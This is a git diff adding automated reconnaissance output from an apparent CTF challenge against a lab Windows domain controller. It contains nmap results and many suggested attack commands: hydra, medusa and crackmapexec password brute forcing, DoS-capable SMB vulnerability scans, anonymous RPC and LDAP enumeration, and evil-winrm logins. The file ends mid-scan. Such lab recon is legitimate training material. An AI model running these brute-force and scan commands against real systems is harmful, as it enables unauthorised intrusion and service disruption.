53 @10.129.243.131 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_errors.log b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_errors.log new file mode 100644 index 00000000..604c1bc4 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_errors.log @@ -0,0 +1,56 @@ +[*] Service scan DNS Reverse Lookup (tcp/53/domain/dns-reverse-lookup) ran a command which returned a non-zero exit code (9). +[-] Command: dig -p 53 -x 10.129.243.131 @10.129.243.131 +[-] Error Output: + + +[*] Service scan DNS Zone Transfer (tcp/53/domain/dns-zone-transfer) ran a command which returned a non-zero exit code (9). +[-] Command: dig AXFR -p 53 @10.129.243.131 +[-] Error Output: + + +[*] Service scan wkhtmltoimage (tcp/80/http/wkhtmltoimage) ran a command which returned a non-zero exit code (1). +[-] Command: wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png +[-] Error Output: +QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root' +Loading page (1/2) +[> ] 0% [==============================> ] 50% [==============================> ] 50% Warning: Failed to load https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.2/themes/smoothness/jquery-ui.css (ignore) +Error: Failed to load https://fonts.googleapis.com/css?family=Open+Sans%7CMaven+Pro:500, with network status code 3 and http status code 0 - Host fonts.googleapis.com not found +Error: Failed to load https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js, with network status code 3 and http status code 0 - Host cdnjs.cloudflare.com not found +libva info: VA-API version 1.17.0 +libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so +libva info: Found init function __vaDriverInit_1_17 +libva error: /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so init failed +libva info: va_openDriver() returns 1 +libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so +libva info: Found init function __vaDriverInit_1_8 +libva info: va_openDriver() returns 0 +[============================================================] 100% Rendering (2/2) +[> ] 0% [===============> ] 25% [============================================================] 100% Done +Exit with code 1 due to network error: HostNotFoundError + + +[*] Service scan SMBClient (tcp/139/netbios-ssn/smbclient) ran a command which returned a non-zero exit code (1). +[-] Command: smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 +[-] Error Output: + + +[*] Service scan DNS Reverse Lookup (tcp/53/domain/dns-reverse-lookup) ran a command which returned a non-zero exit code (9). +[-] Command: dig -p 53 -x 10.129.243.131 @10.129.243.131 +[-] Error Output: + + +[*] Service scan DNS Zone Transfer (tcp/53/domain/dns-zone-transfer) ran a command which returned a non-zero exit code (9). +[-] Command: dig AXFR -p 53 @10.129.243.131 +[-] Error Output: + + +[*] Service scan DnsRecon Default Scan (tcp/53/domain/dnsrecon) ran a command which returned a non-zero exit code (1). +[-] Command: dnsrecon -n 10.129.243.131 -d megacorp.htb 2>&1 +[-] Error Output: + + +[*] Service scan DnsRecon Default Scan (udp/53/domain/dnsrecon) ran a command which returned a non-zero exit code (1). +[-] Command: dnsrecon -n 10.129.243.131 -d megacorp.htb 2>&1 +[-] Error Output: + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt new file mode 100644 index 00000000..0ed1f7b8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt @@ -0,0 +1,77 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:23:46 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.041s latency). +Scanned at 2023-10-28 14:23:47 CEST for 245s +Not shown: 65517 filtered tcp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/tcp open domain syn-ack ttl 127 Simple DNS Plus +80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 +|_http-server-header: Microsoft-IIS/10.0 +|_http-title: Slandovia Energy +| http-methods: +| Supported Methods: OPTIONS TRACE GET HEAD POST +|_ Potentially risky methods: TRACE +88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-28 12:26:10Z) +135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn +389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +445/tcp open microsoft-ds? syn-ack ttl 127 +464/tcp open kpasswd5? syn-ack ttl 127 +593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 +636/tcp open tcpwrapped syn-ack ttl 127 +3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +3269/tcp open tcpwrapped syn-ack ttl 127 +5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) +|_http-title: Not Found +|_http-server-header: Microsoft-HTTPAPI/2.0 +9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing +49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +49674/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 +49695/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +49843/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +OS fingerprint not ideal because: Missing a closed TCP port so results incomplete +No OS matches for host +TCP/IP fingerprint: +SCAN(V=7.93%E=4%D=10/28%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=653CFE48%P=x86_64-pc-linux-gnu) +SEQ(SP=101%GCD=1%ISR=10D%TI=I%II=I%SS=S%TS=U) +SEQ(SP=101%GCD=1%ISR=10D%TI=I%II=I%TS=U) +OPS(O1=M550NW8NNS%O2=M550NW8NNS%O3=M550NW8%O4=M550NW8NNS%O5=M550NW8NNS%O6=M550NNS) +WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70) +ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M550NW8NNS%CC=Y%Q=) +T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=) +T2(R=N) +T3(R=N) +T4(R=N) +U1(R=N) +IE(R=Y%DFI=N%TG=80%CD=Z) + +Network Distance: 2 hops +TCP Sequence Prediction: Difficulty=257 (Good luck!) +IP ID Sequence Generation: Incremental +Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +|_clock-skew: 0s +| p2p-conficker: +| Checking for Conficker.C or higher... +| Check 1 (port 25314/tcp): CLEAN (Timeout) +| Check 2 (port 10793/tcp): CLEAN (Timeout) +| Check 3 (port 25536/udp): CLEAN (Timeout) +| Check 4 (port 25523/udp): CLEAN (Timeout) +|_ 0/4 checks are positive: Host is CLEAN or ports are blocked +| smb2-time: +| date: 2023-10-28T12:27:13 +|_ start_date: N/A +| smb2-security-mode: +| 311: +|_ Message signing enabled and required + +TRACEROUTE (using port 135/tcp) +HOP RTT ADDRESS +1 35.29 ms 10.10.14.1 +2 35.21 ms megacorp.htb (10.129.243.131) + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:27:52 2023 -- 1 IP address (1 host up) scanned in 246.21 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_manual_commands.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_manual_commands.txt new file mode 100644 index 00000000..58e88c23 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_manual_commands.txt @@ -0,0 +1,338 @@ +[*] domain on tcp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt + +[*] http on tcp/80 + + [-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists: + + feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt + + [-] Credential bruteforcing commands (don't run these without modifying them): + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message" + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message" + + [-] (nikto) old but generally reliable web server enumeration tool: + + nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt" + + [-] (wpscan) WordPress Security Scanner (useful if WordPress is found): + + wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt" + +[*] msrpc on tcp/135 + + [-] RPC Client: + + rpcclient -p 135 -U "" 10.129.243.131 + +[*] netbios-ssn on tcp/139 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/389 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt" + +[*] microsoft-ds on tcp/445 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Lookup SIDs + + impacket-lookupsid '[username]:[password]@10.129.243.131' + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/3268 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt" + +[*] wsman on tcp/5985 + + [-] Bruteforce logins: + + crackmapexec winrm 10.129.243.131 -d '' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt' + + [-] Check login (requires credentials): + + crackmapexec winrm 10.129.243.131 -d '' -u '' -p '' + + [-] Evil WinRM (gem install evil-winrm): + + evil-winrm -u '' -p '' -i 10.129.243.131 + + evil-winrm -u '' -H '' -i 10.129.243.131 + +[*] msrpc on tcp/49667 + + [-] RPC Client: + + rpcclient -p 49667 -U "" 10.129.243.131 + +[*] msrpc on tcp/49673 + + [-] RPC Client: + + rpcclient -p 49673 -U "" 10.129.243.131 + +[*] msrpc on tcp/49695 + + [-] RPC Client: + + rpcclient -p 49695 -U "" 10.129.243.131 + +[*] msrpc on tcp/49843 + + [-] RPC Client: + + rpcclient -p 49843 -U "" 10.129.243.131 + +[*] domain on tcp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt + +[*] http on tcp/80 + + [-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists: + + feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt + + [-] Credential bruteforcing commands (don't run these without modifying them): + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message" + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message" + + [-] (nikto) old but generally reliable web server enumeration tool: + + nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt" + + [-] (wpscan) WordPress Security Scanner (useful if WordPress is found): + + wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt" + +[*] msrpc on tcp/135 + + [-] RPC Client: + + rpcclient -p 135 -U "" 10.129.243.131 + +[*] netbios-ssn on tcp/139 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/389 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt" + +[*] microsoft-ds on tcp/445 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Lookup SIDs + + impacket-lookupsid '[username]:[password]@10.129.243.131' + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/3268 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt" + +[*] wsman on tcp/5985 + + [-] Bruteforce logins: + + crackmapexec winrm 10.129.243.131 -d '' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt' + + [-] Check login (requires credentials): + + crackmapexec winrm 10.129.243.131 -d '' -u '' -p '' + + [-] Evil WinRM (gem install evil-winrm): + + evil-winrm -u '' -p '' -i 10.129.243.131 + + evil-winrm -u '' -H '' -i 10.129.243.131 + +[*] domain on udp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default_manual.txt + +[*] domain on tcp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d megacorp.htb -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt + +[*] http on tcp/80 + + [-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists: + + feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt + + [-] Credential bruteforcing commands (don't run these without modifying them): + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message" + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message" + + [-] (nikto) old but generally reliable web server enumeration tool: + + nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt" + + [-] (wpscan) WordPress Security Scanner (useful if WordPress is found): + + wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt" + +[*] msrpc on tcp/135 + + [-] RPC Client: + + rpcclient -p 135 -U "" 10.129.243.131 + +[*] netbios-ssn on tcp/139 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/389 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt" + +[*] microsoft-ds on tcp/445 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Lookup SIDs + + impacket-lookupsid '[username]:[password]@10.129.243.131' + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/3268 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt" + +[*] wsman on tcp/5985 + + [-] Bruteforce logins: + + crackmapexec winrm 10.129.243.131 -d 'megacorp.htb' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt' + + [-] Check login (requires credentials): + + crackmapexec winrm 10.129.243.131 -d 'megacorp.htb' -u '' -p '' + + [-] Evil WinRM (gem install evil-winrm): + + evil-winrm -u '' -p '' -i 10.129.243.131 + + evil-winrm -u '' -H '' -i 10.129.243.131 + +[*] msrpc on tcp/49667 + + [-] RPC Client: + + rpcclient -p 49667 -U "" 10.129.243.131 + +[*] msrpc on tcp/49695 + + [-] RPC Client: + + rpcclient -p 49695 -U "" 10.129.243.131 + +[*] msrpc on tcp/49843 + + [-] RPC Client: + + rpcclient -p 49843 -U "" 10.129.243.131 + +[*] domain on udp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d megacorp.htb -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default_manual.txt + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_patterns.log b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_patterns.log new file mode 100644 index 00000000..e104793b --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_patterns.log @@ -0,0 +1,8 @@ +Identified Architecture: 64-bit + +Identified HTTP Server: Microsoft-IIS/10.0 + +Identified Architecture: 64-bit + +Identified HTTP Server: Microsoft-IIS/10.0 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt new file mode 100644 index 00000000..f5299e55 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt @@ -0,0 +1,67 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:23:46 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received 